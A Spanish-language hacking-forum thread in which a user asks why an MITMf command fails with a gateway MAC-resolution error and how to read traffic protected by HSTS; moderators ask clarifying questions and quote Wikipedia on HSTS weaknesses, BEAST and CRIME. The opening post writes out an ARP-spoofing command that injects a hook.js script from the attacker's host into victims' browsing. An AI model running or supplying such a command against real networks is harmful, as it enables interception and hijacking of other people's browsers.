Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] No me funciona el MITMF. Ayuda.

  • 2 Respuestas
  • 261 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado bl4cklamb

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Septiembre 10, 2019, 09:03:13 pm »
suelto el siguiente comando

mitmf --spoof --arp -i wlan0 --gateway 192.168.0.1 --inject --js-url http://192.168.0.42:3000/hook.js

y me dice:

Error: could not resolve Gateway's mac address

Alguien sabe a que puede deberse ?? y por cierto antes era facil capturar trafico ahora con es hsts me es casi imposible, alguien sabe como capturar ese trafico o leerlo ??

Gracias
« Última modificación: Septiembre 13, 2019, 03:48:53 am por AXCESS »

Conectado DtxdF

  • *
  • Moderator
  • Mensajes: 401
  • Actividad:
    45%
  • Reputación 9
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
« Respuesta #1 en: Septiembre 11, 2019, 07:49:42 am »
Citar
Inglés => Error: could not resolve Gateway's mac address => Español => Error: no se pudo resolver la dirección mac de Gateway

¿Estás copiando y pegando exactamente? "No deberías, al menos que hagas correctamente los cambios de configuración" ¿Estás conectado a una red local? ¿Esa es la dirección IP del ruter (router) realmente? O ¿simplemente haz intentado resolver tu problema de acuerdo con la traducción?. Espero tu respuesta para que podamos aproximarnos a una solución ...

Done.

- DtxdF
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado AXCESS

  • *
  • Moderator
  • Mensajes: 474
  • Actividad:
    55%
  • Reputación 12
    • Ver Perfil
    • Email
« Respuesta #2 en: Septiembre 13, 2019, 03:48:11 am »
HSTS Limitaciones

https://es.wikipedia.org/wiki/HTTP_Strict_Transport_Security

La cabecera HSTS puede ser despojada por el atacante si esta es la primera visita del usuario."

"La solicitud inicial permanece sin protección contra ataques activos si utiliza un protocolo no seguro, como HTTP simple o si la URI de la solicitud inicial se obtuvo a través de un canal inseguro. Lo mismo se aplica a la primera petición después de que el período de actividad que se especifican en la política HSTS anunciada max-age (los sitios deben establecer un período de varios días o meses dependiendo de la actividad del usuario y su comportamiento). Google Chrome aborda esta limitación mediante la implementación de una "lista STS precargada".
Incluso con dicha "lista de STS precargado", HSTS no puede evitar los ataques avanzados como BEAST o CRIME (ambos fueron presentados por Juliano Rizzo y Thai Duong). Esto es porque los ataques son contra TLS/SSL en sí, y por lo tanto son ortogonales a la aplicación de la política HSTS.
"

BEAST
https://es.wikipedia.org/wiki/Transport_Layer_Security#Ataque_BEAST

CRIME
https://es.wikipedia.org/wiki/CRIME

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 22513
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 9661
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 8266
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 12829
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 7922
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made